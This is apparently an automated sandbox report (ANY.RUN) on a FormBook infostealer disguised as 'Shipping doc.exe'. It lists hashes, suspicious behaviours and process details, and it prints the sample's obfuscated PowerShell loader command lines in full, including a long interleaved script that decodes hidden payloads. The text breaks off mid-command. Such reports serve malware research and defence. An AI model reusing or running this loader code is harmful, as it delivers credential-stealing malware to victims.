File name:

Shipping doc.exe

Full analysis: https://app.any.run/tasks/5afa0e4d-f7b3-40e3-bc04-24ce8d314c2c
Verdict: Malicious activity
Threats:

FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus.

Malware Trends Tracker     >>>
Analysis date: December 06, 2023, 14:14:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
formbook
xloader
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5:

C7CED9666598285A885FD798BD9B5727

SHA1:

BA045289BA06F9A078C8AD705858D0C098A19028

SHA256:

4B515E730EA1CA9505DAD8EC279AE295B945DC93308248DF2315763B15FEE19D

SSDEEP:

24576:1J8dUmsYqNMJFwCuegu2OeepjLUR1VkWCedt:1J8qmsYqNMJFwCuegu2OeepjLURNCOt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • FORMBOOK has been detected (YARA)

      • verclsid.exe (PID: 2936)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 996)
      • Shipping doc.exe (PID: 2736)

    • Reads the Internet Settings

      • Shipping doc.exe (PID: 2736)
      • wab.exe (PID: 1652)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 996)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 1652)

    • Application launched itself

      • powershell.exe (PID: 996)

    • Reads settings of System Certificates

      • wab.exe (PID: 1652)

    • Checks Windows Trust Settings

      • wab.exe (PID: 1652)

    • Adds/modifies Windows certificates

      • wab.exe (PID: 1652)

  • INFO

    • Reads the computer name

      • Shipping doc.exe (PID: 2736)
      • wab.exe (PID: 1652)

    • Checks supported languages

      • Shipping doc.exe (PID: 2736)
      • wab.exe (PID: 1652)

    • Create files in a temporary directory

      • Shipping doc.exe (PID: 2736)
      • wab.exe (PID: 1652)

    • Checks proxy server information

      • wab.exe (PID: 1652)

    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 996)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 1652)

    • Manual execution by a user

      • verclsid.exe (PID: 2936)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (67.4)
.dll | Win32 Dynamic Link Library (generic) (14.2)
.exe | Win32 Executable (generic) (9.7)
.exe | Generic Win/DOS Executable (4.3)
.exe | DOS Executable Generic (4.3)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2021:09:25 23:56:47+02:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 141824
UninitializedDataSize: 2048
EntryPoint: 0x3640
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
2
Suspicious processes
3

Behavior graph

Click at the process to see the details
start shipping doc.exe no specs powershell.exe no specs powershell.exe no specs wab.exe #FORMBOOK verclsid.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
996"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $fat32 = Get-Content 'C:\Users\admin\AppData\Local\Temp\undercapitalize\Howes.Mad' ; powershell.Exe "$fat32"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeShipping doc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
1652"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\certmgr.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
2488"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Parketternes Blasphemously Noedvendighed Nummereringsmetoderne Stengulves #>$Ritraadenes = """Ci;HuFJouKonNucNotPoiAuoJan D KiVDeA TRJu5St3Me bu{Ha hy Me Fi repRiaMerBeaTimCo(Tu[LsSSlt brReiConMag K]Ls`$ ASHuiTngSpnFoaSulSui Vs SeKldMa)St;Fo B`$BlF BjUdeakrplbUnuBesVrkKueKnnMeeSosFr Pe= H Ad`$kiSSeiFogAunAbaPolUdi MsDaeVidBl.ReLLaeScnMigVetMihbe; D Sw De Al Ca`$DeRPheFlt HsKltAliMolAflBei CnEggBueStrFasFl Be=Sy TeNHaeImwFl-ReO Nb Tj aeAfcFet p MabAmyCyt TeFo[Ro] O A(Ik`$arFRejReeSarGubNouInsBrkBoeDrnAbe UsSu S/Si Fa2Pe) P;Tr Ko`$KrC OeTapemhRaaTulPao NbUlr Sa AnSacCohski TaEvtPoaKr=ek'FaSFjUCo'Be+Pu'unB CSHaT tRReITiNSaG O're;So Bo P Mu PFBjoLirma( S`$ UCCho CrCadPolFriChkTreun=Ef0Pr;Cy Un`$KoCeioRerUdd Al jiCokReeUn L-FalWat P K`$epFFijKoeRaraabSmuGusDhk ReDonaneDes C;Se Ve`$MoCSuoFrr sdRelTriMakBeeUd+Do=St2Em) A{ S N Ve Mo Op Au al T Ka`$SyRefeDutPrs EtSaiOflMolVdiPanSigSpeCor ksBl[ A`$CoCSdoRerPedHalDuikokRaeDo/Un2Be]pa o= B hk[ ScReoAsntav KeTerDot U]Ob:Me:KuTFooSmBDey RtKneNi(Ol`$OvS Oi SgTinMaaPyl piKos WeSldAu. S`$ReCHaePlpJohOra mlFaoVibDirFoaBenAccFohLui LaLat Sa L.AcI GnUdv Co IkSueno(Rd`$MaC soStr Sd RlLai TkSeenu,Ov up2Ha) K,kr Ma1Ud6Hr)Bl;De Fo Si`$koRFueGatResHat CiKalColGniCan SgOveCorBusPs[Ba`$YeCFioDarIrdLolAdiEkk Be P/Ga2Ca]do Ba= D HO Sbses FeSmrBevSkaRetRerPeskotmaaAftBeuRosDoeUdrSknBle C8Ps Ca`$ IRBreUntfis ptIniYdlEflShiMinunguteAprInsCo[Gl`$ UC CoOfr TdHulTaiHekOuebo/Va2Pa]Fd L1Ud7Un4Hi; s In H Di Ma}Sa So[InS ItAfr BiMin Jgra]Me[FuS TyDmsRatMieAfmfa.PiTdaeSkxTrtSa.KoETrn Tc EoMad riVanPeg B]Sp: I:BrAHoSSgCAfIFlIAg.FeGSke WtSpSCetTor riTrnFagma(An`$BuRAuevat MsErtFriEslKnlKoiDinOpgMrePorAfs L)Pe;Li}Ar`$ArETibUtuBelDel BiLytDiiMeo CncosIn0Dd= TVHoAMeRRe5Be3Be sp' EF pDAdD k7KoDGiD VDThAPlCPrBFrCHi3Fr8Sa0MoCEpABrCFa2UhCAn2Al'Su;Om`$ kEClb Ku PlAllVai StIgiPuo TnCusri1Pi=SuVYiAMaRDd5 S3Un D'BeEMe3EvC S7FaCAuDDiDSwCCaCCo1OrDSaDTiCvi1flCpo8beDCaAHu8Da0 MFGg9HaCRe7CiCBl0Se9VoDTr9EnCAr8Ch0UnFAcB CC S0 SDUnDMdCInFUnCRe8FaCbrBmiEDi0 BC UFNeDAmAPrCPi7StDGi8StCTyB rEDe3FuCOvBApDfoAbaC S6ZeCKa1CoCPoAUnDPaDBu'Re;In`$ArEInbAuuRildelCyiPot TiFeo TnNosTr2 H=PsV YAFrRVi5 G3Du Un'FyETy9LiCJoBAmDLaA PFSkEDrDOiCBuC T1 ACMeDSeERuFVeCfdAPsCBrA SDtaCAwCBrBpiD UDStDGlDSp'Re;Mi`$GaEFebCouOrlNol MiTitSpi FoVanCysco3Pr= IV MAAaR B5Tv3 t tr'UnFScDGlDKe7afDPhDChDSkABiCPrBOrCdi3Ri8Dr0TuFMiCReDNoBUuCMi0 FD fANeCAf7DeCFo3TrC DBCe8 c0AfELn7KeC D0unDCoAReCTaBChDCaCMoCSl1RuDInEEnFUaDGrCvaBNoDloCUnDgl8GeCSv7 BCBnDStCOvBOdDExDDr8Se0UnE T6SpC OFTiCFo0GrCSeALnC R2WaCMaBAvFNoC SCBeBPaCHe8Vr'Ve;Pr`$ UEAfbSmuAflMelFoiEstGoinoo UnpasSk4Ba=KaVKaADrR A5Se3In ba'RiDGaDDiDFoAUnDbuC PCTr7tiCDe0 TCFo9 M'ge; T`$ IEFob CudilOmlGeiRet OiSuo Sn LsGn5Di= SVVrAHgRFr5my3 B T'moEDe9IlCUnBbrDFlASuEVh3FoCDu1GaCScA BDSoBTaCFe2PrCPrBStEFa6MaC EFFoCCo0SeCtiASeCTa2BaC LBCo'Sn;Ca`$ MEKubOpuStlAnlLiiSttIniDioounResGr6 U=MoVHoAThRPi5Te3Hr tu' HFAlCFiFUvA UFInDAbDRaEfoCReBSuCHoDRuC R7ReCafFEnC S2GiEAr0 UC AFAfCDr3ShCBoBJu8 C2Tr8UnEEkEgh6StC A7OuCAcATkCCrBPeEMaCBrDVk7stFGaDDdCPi7SpCFa9Te8Fe2 M8 SEBuFEfEPeDFoBZyCCrCExCSp2MiC P7UrCBaDSk'Ta; C`$DiEUnbRiuLolBrlFoiSetFoiStosvn AsFi7Ka= SVFlAUnRMe5St3Af Om'FlFNaCSkDReBFaCli0BoDFaASwCBe7NoCFo3OvCEkBSi8Gi2Em8ceE HESp3 KCFdFFoCTr0 SC TF RCCy9HaCKaB ACLiATa' N;Co`$ UEVob RuHolPelReiKntEki no snAfspu8Ly=EfVDeAHyRDe5Ud3un Co'daFTrClkC HBUnCla8 JCph2DeCBoB RCGeDAcDInALeCAnBSaCDiAMoEFlAGoCOmBAnC A2SvCSaBBrCPo9IsCDiFStDRhA SCIsB S'Lo;Gu`$slESybziu KlLilCoi stCriFro AnOus P9ho=PoVOvA RRMo5Un3Dm Al'DeESk7SyCCa0HyEFo3AsC SBBoCUd3 SCIn1PeDAbCstDHv7SkEAr3 TCHo1KoCNoACaDsvBAmCRo2UsCunBMu'Fd;pa`$ HR CeDrtFitAbe KsSpkLiehemTiaHeererSon Fe gsAn2No3 S3Ku0Ha=PrVCiAUnRWr5Ch3Me Ud'MiEAs3StDSl7DeEUnAGeCSkBKaCKo2ReC TB FC D9CiC DFruDSuAReC PBLoFDiAPiDBr7CoDGaEmoC BB B'Ho;Pl`$paRAde pt StVeelasThk Se VmFoa LeSkr NnEreHlsav2Sk3Gu3 F1He=OmVAfAUnRMy5In3ur Ko'HyEReDPrCSm2 aCInF MDDeDBeD SDMe8 c2Ro8AfE KFAsE FDCiBUnCVoCLiCVe2FiC S7YiCTyDUn8Pr2Di8 PE mF MD DCUnBSaCOrFCoCOr2SoCPiBNoCYaATr8Pu2Gl8geEChEUnFZyCMe0 LDfeDsmC K7 cEliDDiCLs2 KCDuFKrDRaDPuDTiDSh8Va2su8RaEScELaFBeDSiBFlDHuA SCOu1EvEHnD CCFo2SiCLeFUsD fDUnDTrDDo'be;De`$FiRSee Ht TtKoebos TkLieSkmWhaFieomrprnSueLas T2 B3 o3Tr2 A= AVFlAAkREu5In3sc Di' IEVi7MiCHe0SkDLa8 TCSa1CeCTa5alCUvBOp' T;Po`$ MREueBrtDit MeBlsfikTieRimVeaUneorrBanDiedasGa2Op3 T3Se3An=SkVPeABrRSk5ch3La Li'CoF PEAqDLiBPaCCoCJuC D2BiCAd7 oCCrDGr8Af2 f8PaEDuENo6MoCFa7PeCQuAInCarB UEdaCLiDfa7TeF BDreCTe7SuCRa9Ps8Fo2In8 SENoETi0MuC ABMiDUn9UdFAmDSeCDe2SpCFo1AuDMaALu8 N2Pr8 AEPaF A8StCIn7FoDTeCSoDInACeDPaBNeCSiFUnCBa2Ph' H;As`$PrRBleRot Mt SeDysRekNyeSomReaKae Vr Vn Se CsUd2Ng3 P3My4Fi=CoVPuAGaRNo5Fo3Fl De'AvFTr8RuCJu7AtD FCMoDNoAGlDOmBMaCUnFAfCOv2BoENiFBrCTo2FlCFy2leCSa1InCClDAd'Sy;Pr`$OpRlaeBatFot NeBrs AkUneIsmAnaPaeTrrLanHyeHosPa2 L3 T3Dr5Im=GiV tARaRTr5 L3 i Re' HCEl0NoD SA SC EAPoCVi2SkCPr2Ha' C; E`$ RRBreYdtAntAaeAnsStkSteChmhaa EePrrOrnreeNosSe2Mo3St3Sp6 P=SaVTeAOmRra5 S3So Po'UnE P0 TD BASlFSpEEmDReC SCRe1AfDUnADiCVeB pCrhDDeDBeADeFTi8 GCSe7DiDPrC HDGeAShDViB LCBeFDrCVo2AiESo3juC DBWiCSt3UdC K1PrDCoCKyDPu7 H'St;Pr`$BlRFje StSitMoescsGrkeqeSwmCoa BeDirFlnPaeSasha2Ka3 R3Ba7no= pV EAScR o5Hi3Ba Na' SE N7 BEFoBelF W6No'Tu;Ma`$ovRSueSwtCutUneGosBykBreSumMaa Se FrAnnSaeStsRa2Ta3An3 I8Sp=TaV SAReRSn5 s3An M'PyFSu2Ve'Ko;Mi`$ IKAnlTroHeaOrkPslEreCodAnnMoiTenReg N2 L0 K=SlVPrAAfRUn5Ha3Ce F' PFssBOpF LDCrESkBAuFUdC M9LaDFr9BeCAl'Eq; M`$HeNtraDir Ba DgSutKoiSag Hs gtMieTa=BeVReAPrRAn5Fe3Or Or'BaE SD MCKoFBeCGo2TiCFo2 AF M9AnCAa7StCTr0RoCImAFoCtu1DiDPo9OrF SEKoDBnCPoCTe1trCUdDHoEFoFUf' B; AfUnuBrn Mc UtunitooTynWe UdfRak Sp C Re{ TPRsa Gr UablmLa Fl( A`$ToKKalMiuRukFrl aaVatSttSaeThrBesba,Ho A`$LaRReuAmePilUpi KkVeeRa5Le7Sp) B Be Fl Be Ha Ur; S`$ GDGeuBae UnOpnUnaBudMioInmSe0No Ad=MaVSoATrR D5Mi3Do Ka' N8efAFaESt0HaCMe1AlC R0 SCsu3HeCRe1 CDReBQuCTe0BoDfiAPoCegFUsCSa7 DCOp0FiC S1OpDZaBcaDTuDheCUd2 MDSe7Fa8UfEBr9Dr3Le8EnE F8tu6TaFSt5 TEAfFFoDPhEgaDOvE SEKaA PCAc1TiCBi3WaCFrF SC D7BlCAb0KrFKa3Sl9Pi4Me9Bi4 DEfiD ODigB SD UCReD MC BCSaBKrCMe0 DD AA OETeATiC R1UrCBe3HaCSuF TC A7SeCNa0Ch8Ci0 AE C9MuCRdBMeDBuA DESpFEpDBuDflDprD GCFrBnaCLd3TiCStCHyCCa2CoCDe7 MCPlB KDAsDKl8Be6Re8 K7Fd8DoEGaDun2Sc8 CEJuFGe9SwCVe6CiCIrBSnDArCHoCClBPu8Se3MiE S1 RCTjCLeCBr4DyCEsBSnCHoDKoDAaA G8 pE PD M5 C8maEUr8 NAArF H1Re8 G0DeE K9 KCAf2TuCTr1raCCoCFaC SFBaCRa2PrEopFPaDBoDDeDPhDudCSpBAlCHv3KoCLeCAtCmi2FiDRu7FrEReD PC SFTyC DD iCSe6KyC RB L8CoEOv8Pe3BuEGaFnoCAn0FiC NATo8OeEQu8 PAAmF A1Wo8Ra0 uEGo2 SCIn1MaCBiDKoCCaFOvDNaAFdCVa7StC S1SjC Y0Mu8he0 RF DD UD bEAfC L2PlCGa7ArD BA B8La6kl8 FAHyFTeCUnCStBUnDInAFlDStA HC BBOpDSkDGeCBa5ReCDiBJeCSt3PaC CFNiC NBPsDShCErCPr0SaCTaBTeDCoDIs9ViCFa9PrDOu9MeD S9In6Em8Fl7UnFRe5Fo8Bi3La9KyFbaFKa3Fi8Al0BeE EBOrD AFGyDHeBUlCEsFFrCfe2RoD TD H8Aa6Je8SvAFrELgB RCDeCdoD HBSeC M2PaCLv2 DCKa7MoDLyAUrCSe7GiCKh1UdCOl0ChDAfDFe9HeE S8 L7ch8 GEgoDZo3Ol8Gy7Xe8 L0ReERu9GiCScBneDveAPaF NAUnDMi7BaDnoEduCMeBLa8Hu6Cr8spA FE FBReCchCInDUnBFlC H2FeCSy2AnCKo7MiD BABaCRo7AsCTh1OlC P0BeDMiD V9FaFCi8tr7Re'aa;Ko&Ax(Lu`$BaRFreUdtAlt GeMesLik Le JmFraUne PrAtnFaeSksSk2 V3Ma3 C7 S)Un gr`$ ODLeuCoeBen SnMiaFydFlo OmSw0St;ov`$SaDSiuMaeKln RnLoaTedEtodemUf5Ci Go=Bj SfVSeAArRSj5Ca3He Ka'St8FoAArDToD UDTiBBlDKoEEsDKeESyCSc1GaCHo0TeCBaBEtDChCSv8ArEUn9 E3In8KlE A8inALsE A0 LCUn1DiCGr0 NCSe3quC S1UrDAtBsuC T0NoDIlA TCVaFAbC B7FoCno0CoCLy1EnDsuBTiDCuDBrCSc2MiD A7Me8co0 PE T9YaC TBStDkoANoEAf3FiCMeB ADYdAUnCCr6KoCAt1FaCAlATr8Dv6Om8InAGoEPsBNoCBoCFyDTrBChCIr2EmCVe2TeCMa7StDAlAExCAu7 fCUn1EnCOp0 SDAnDMa9 SCUn8Te2St8SpE TFCe5EpF FA ODLa7TeD PEKeC BBAdFRi5FeFTh3 PFaf3Un8CrEKoEFjEFr8De6Mo8HvATrE WBLiCGrCChDFrB sCSe2AnC N2SpC P7koDNeA PCAf7FoC B1PoC H0ElDInD R9anD N8Ba2br8KiEOp8 sASnEHyBSpCInCExDRaBArCNo2 ACun2ApCSt7RaDSuASaCSu7 VCSk1DyCCo0ShDLeDNo9KaA R8Un7Ni8Cy7Co'He; P&Ju(Or`$DiRSte HtHat DejesEsk FeMymTaaReeUnr FnMaeAds P2Ch3Sn3Ek7Un)Sa Tr`$UnDStu FeDinvinmea GdmioBamin5pr;Un`$InD SuFreHanNenDeaundCioStm S1Hu Di= E SkVAtAPhR G5De3 E Ce'PaDUnCKiCPsBDeDFjA ADFeBPeD LCScCUn0 L8HaELu8MuATiDPhDHiD FBtvDGiESoD MEhvCTo1BaCRk0FlCViB PDToCCa8Om0frE o7diC E0MiDBf8foC T1ScC U5BaCReBMo8St6Mi8SlASaCRo0 SDGrBGuC M2PrCEr2Ud8Re2Di8HeEAvE IEDe8 S6TrF S5SuF LDErDSe7GiDFoDOuDelA UCdaBNoCEd3Un8An0 DFReC PDDrBFrCPr0QuDStAPeCDe7 SCGi3LiC fB A8Ov0noEAr7KvCLa0CeDpaAHeCEsBScDNoCEmCAk1LdDCoEstF LDTeCGaBZoDEnC fDPa8SiCRe7NuCMeDNoCSyBTeDPrDTr8Fo0ovEet6GaC LFWiCBr0SnCEsADuCAp2BaCNoBStFSoCOuCGeB KCTe8 CFEk3 H8St6dyEVa0ReCMuB UDst9Ar8La3 JEFo1suC UCStCAu4thC SBTiCFoDSeDUdARe8TrENoFMbDInDSe7 SDPeDSpD HAPsCSeBDiCfd3Si8su0miFreCDoDBrBTrC B0AuDGaALiCBr7VeCRe3TaCUdBFi8 b0TuEBa7AdCFl0BiDguATiCUtBpoDDiCMeCUn1MiD HEHaFToDSpCSuBhuDRoC QDMu8SkCTr7KaCSlDSkCafBFrDHiD I8No0 CEMe6 FCBiF ECDa0BjCAnAChCTr2guCMoBPeF KCFiC BBSlC S8Ku8Gg6Ku8Pl6StEbe0SuCBuBAsDSk9So8Ra3ExEke1TeCDuC TC S4GiCudBDoCMiDNaDflADr8NaEBaEfi7SiCSn0 DDMiA TFLeEAdDopAOcDOvCKu8 V7Br8Dr2Un8DeEDi8Jy6Op8ReA BE M0HyCBe1 SCTe0BoC K3 PCSy1AzDraBCuCCe0stDepABoCAfFStC D7BaCFi0 BCdi1MoD jBWoDBrDSuCSj2 SDSk7To8Af0SpEUn9SkCKlBraDHoAAlESo3TeCUnB CDReAErCSt6 WCSp1 uCUnA G8Ab6 N8RoA FEFrBTiCBrCAuDsaBSaC n2 FCHa2FiCSu7DkDrrASaCCr7KrCGe1OfCSt0MuDBeDKo9KrBUd8dj7Re8Ko7St8Ou0KlEKl7MeCDe0 BDUr8 WCsp1OpCAm5EvC bBFy8 N6Fl8 SA UCHo0OkD EBIsCHa2 dC T2De8Ch2Ha8PrE IEReE G8Br6Bo8InA MEFu5AnC K2PrDDeBPuCKe5UnCTu2ReCCuF ADPlALoD PA FCRuB KDpoCFoDKoDSt8Or7Sp8Gi7Do8 R7 H8Go7Or8re2 D8 SEin8UnAAdFplCRaDStBStCseBSpC F2SuCRe7ReCCu5 OCTeBMo9AfBCh9Mi9Er8 k7Bs8Fe7 P'Va;Ha&Ko(pr`$ RRReeVet StDee Js MkZeejomNuaCleBurWanStePlsDo2Tu3Re3 U7Gl) J I`$TaDRguAueTonSunUnaDidMeo RmHi1 E;Re} VfRauHen UcAntSmiBioStnMa BeGPhDAgTZo Ge{PrPflaBrr KaDemJe B(fo[CePNoaLarTaaMimDdeJatBaeAnrSn( RPsaoFrsTiiDotUnimao NnMa Tu=Mi Po0 M,Tr SMEba RnTrdVeaVat Ho SrAnyFo A=Re Kr`$ STDar CuSceSp)Ex]Pr In[ TTFoysapSmeMa[An]Fr] P Un`$NsGAsoStwSckDei JtSueEgsAptGeaDenEudSadWheSylSaeFonUnsVa, A[SePSpaSkrHaaAtmSueBytCie CrFl(OmPMeoHysSaiVatRdiTio EnKo Se= V Cr1Mo) S] N ma[AtTheyNapFoeVa] C Om`$ PpCor keCad LiSocUptOuaUntFieMo Bi=Su Ko[LoVKuoTaiPrdps]Ob)Be;Ir`$AbDefu Oe Mn knUnaSedynoBumHi2 E In=Ny ApV IAFoRLf5Lo3sl Pe'Tj8OcACaE N8 SCEy7HoC A0OvC sFClCKf0SnD LD VCba3NeCFa7BeCPe0TaCSy7 RDarD ADSuADuCGuB GDViCVoCOu7VaC WBRkDGeCPrCIn0TrCMoBunD KD P8HyEel9Ve3 O8 NERoFSw5SpEOyFCoDMaEAaDBaEMiEPrAskCOu1 TCEj3SoCStFHjC I7 HC N0BoFYo3Lu9Se4Gu9Ca4 PESpDBoDSkBCiDPyCNaDDeCSkCpaBBaCUa0LaDOrACaEFiAroCHe1KnCBy3WeCFlFJoCMe7WaCil0Fl8He0 eEMeA TC FBPrCAn8UnCMe7ExCSe0 SC rBFoEFjA CDca7NoC L0SkC WFPrCMa3UhCSt7ReCPrDpaESwF TD tDEpDdeDMoCAfBFaC I3 PCFrC HCTh2DrDPu7Fu8Fo6 S8am6PrEfj0BaCAfBAbDGi9Vi8Ki3 MECa1SvCKuCSaCCe4 TCUdBOvCMoDFrDCoAAn8 GE CFSpDImDfi7PiD TDSiDStAInCNaBsnCPa3Ad8ex0SpFSlCImCUiBToCSh8 MCri2OvCUnB CC sDReDBoALoCIl7PrCAm1BlCBo0 K8Sp0FoE IFSpDFyDTeDCoDVeCBeBmiCAd3PaC RCFlCLi2SyDAb7AnEFo0RuCPlF HCLa3 KCpaBfi8Pe6Ud8KrALuECaBSiCInCSoDPiBOvCDu2UnC C2KaCBu7SeDChALnCSc7 JCSw1BaCLe0PrD EDFi9Vo6Un8Di7 S8La7Re8Th2sl8zoEMoFpa5CoF FDPoDPe7NaDOrDRhDHjAesCVeBMoCTa3 E8 E0inF NCMaC CBAfCOr8SiCRo2QuCAbBBeCElDIrDflABjCFl7KlCRi1StCEf0Ka8No0SaEBeBPoC R3InCCa7HaDauAMo8Ta0AlERoFPrDBuDHyD ODStCUdBcoCKa3SeCSaCMiCAf2UnDSp7MeEOpCRuDBeB TCNa7UdCQu2 tCSnAEnCBeBstDCtCNeETeF CCUdD DCerDCoC sBBrDUdDMaDMiD AF E3Ba9Fr4Un9Te4VeF ACStDgbBKoCGa0 D8St7Dk8Er0WaEBoA fCKiBCaCCe8MeCKo7CoCPi0LoC PBjoEFiAChDDe7FoC T0SoCSuF SC M3SpCKa7 LCFuDEfECy3NoCAb1SwC FAHaDIsBHoCSp2TeCAfBFi8Te6An8BrAGeERaBnuCBjC ODErBDeC A2blCEk2KrCHj7AaDEkAKeCVe7FlCTi1WhCCo0 BDEfDBl9 S7Co8Be2Sv8AuEBe8BrAPoCSl8boCBeFGaC W2BoDekDAtCFeBGi8Be7Vi8Se0 CE HA SCDrBSuCAf8AfC B7FaCHk0adC BBDrFTvAbrDSk7StDscEAfCDiB P8 P6Pa8PoAsoF sC RCJaB SDHeAAbDAnA NCThBArDUdDSeCSy5SwCkaBAgCDi3ZiCKdFPoC ABtuDApCbrCTe0ElCstBAnDKoDUr9 OCHi9 BDst9SkDTe9MeEGn8Dr2Fi8CyEIn8 UA mFPrCKoCSeBOrDFlA GDLeAViCShB PDPoDatCde5BeCFrBBaCTh3 NCLyFZyCLiBglDTaCMoCFr0ReC TB TDBeD r9 DCRe9ReDTe9 PDKr9SaFPe8Ta2Bo8 REWaFGr5rhFOpDTeDSt7 lDOmDSeDloAMaC IBHeCDe3Dr8Vu0PaEOu3FuDSaB LCVi2leDUdASrCRd7 BCpaDCuCFoFUnDMeDTeD AAmoE DAHeCReBtuCOp2HaCSkB YCPr9SqC LFUnDSpATiCFoB AF O3En8Kv7Qu'Kn;Pe&Ew(Am`$AnRHyeEltLatNeeElsDnkTieDrmInaRgeEarTanEveTrs Z2Bu3No3Ja7 H) u Ph`$AmDHeu AeHanStnViaPedvroNumHa2Ne;af`$ SDOvuPueAnnFlnSpaZod KoHamRe3Bu Sp=Do TVReAPlR t5Ty3Si St'Or8 PAFuEOv8anCEc7SkCCa0prCClF NCLi0RaDVuDerCDi3 OCRa7 FCer0ChC A7seDBlD UDAmAFrCTeBLaDTrCCoCSk7SaCSaBSnDTaC SCSk0PaC SBCoDPrD T8 F0AgEliAFoC EBChCUn8ExCKr7ReC d0foC RBFoEDiDBaC P1CoC R0vaDelDMoDSuA fDUnCHeDMoBSeCkoDJaDNrADeCBo1MiDDiCNo8 F6Pa8GeASpE MBCiCCeCKlD FBAfCFr2OvClo2UnCEp7TaD DAChC P7PlCGl1 FC S0WhDChD R9Si8Di8Da2Ro8RaE PFSe5 FFBlDTrDTr7UdDPrDLaDStAPoC SBStCgl3Co8Ep0VaFniCKoCJaBSpCTi8UnCCr2HoCStBToCAfDHjDAmA aCCh7ufC m1KoCPh0Ir8 M0MaEkaDInC AFprCNe2ReCTi2ViCPh7AfCUp0 JC F9InEBeDMaC J1RaCGa0 BDIm8RaCRaBMaCan0sgDSpAReC C7DeCPe1UnCLa0DrDUnD LF P3 t9 I4Te9In4GrFNoDMoD UADeCAnFfeCFl0MiCRhA WCTiFBuDCyCtrCGaA F8Su2ch8BiEIn8PoAMiETh9PoCKi1 ED O9OvCBa5GoCLe7 PDGaARaCOsBLiD JDMaDRiASaC HF TC J0CaC RAAnCNoAShCSpB ICIn2TiCPrBSeCPr0GtDApDWi8Ha7 L8Ha0ShF FDSeCReBGaDAcAShEVr7GrC C3LaDCrEOvC C2UdCafBGaC S3HiCEgBUnCKa0 OD SAAfCStFFrD FA YCRe7coCTa1FiCSp0 hE C8PhCAn2MuCInFSlCSh9QuDsuDPi8Sp6Me8UdAseETvBLoCInCPaDDiBBeCKi2UpC C2 nCke7 JDOrA KCRe7PhCGi1AtCGu0kaDZeD H9Fo9Aa8 G7Ra'ma;Dd& G( F`$ URAreTatLitDueCasGrk CeHmmgeaBreMurPonSaeTesde2Ri3 S3Pr7Um)re Bi`$ GDSiuGaePinStnSaa KdDyoSymCa3Al;Sk`$AfDAmu Te AnKlnVlaAcdSlo Sm E4 p au= M HoVreA DROb5ti3br st'pa8InANeE n8SwCFe7DeCAr0PoC pF UCbo0BlDSeDLaCJe3 CCSu7ReCUn0EsCTr7ShDRaDOuDEmA BC ABAfDMaCreC O7IdCBoBRoDKiCMoC P0FrCJoBsyDUnDKe8Qu0 AEapAStCBiBReCAr8FrCRv7MoCUl0SpCLaBinEHd3InC UB SD MAHyCKn6UnC F1UnCVvA x8Ph6do8deAjuFSpC WCGaBEmDJuAScDSkAPaC OBSkDSoDBiCCs5TkCBrBBrCTi3grCviFThCBfB RDSmCLeCMe0ivCafBSmDJvDSa9 DCCo9 CDSo9udDPi9riCir8Pe2 M8EmEPa8BeA PFMaCBeCCaBHaDPlAnoD aA SCAlB NDakD RC M5PiCUpBUdC L3 SCElF ACEcBBiDKaCteCLe0GaCTeBSiDCoDFi9 OCBr9NiDFi9EnDKd9BoDUn8pr2Re8FaEsk8KvADaDSkERaDAnCNyCTyBGiC SAToCWh7DiCOuDStDTiAdeCTiF bDSmAkiC CBDe8St2En8BeEAp8SiABoEGu9MeCAn1InDTo9SeCSt5UdCLe7 EDSpAMuC PBStDPoDOvD KABrC CFBaC S0InCVrAMuCKrA FCDeBTrCTi2CaCInBReC C0SkDAaDHi8Ti7Ul8 S0 MFFiDEvCFuBSeDdrA BELe7AtC X3MoDSoE HCPr2 BCDiBCyCde3foCPoB PCSa0 TDvaADeCFeF DD AAdrCVe7InCsl1 cCFl0RaEIn8FrCbl2PrCInF OCSi9DaD DDBl8Au6Hu8 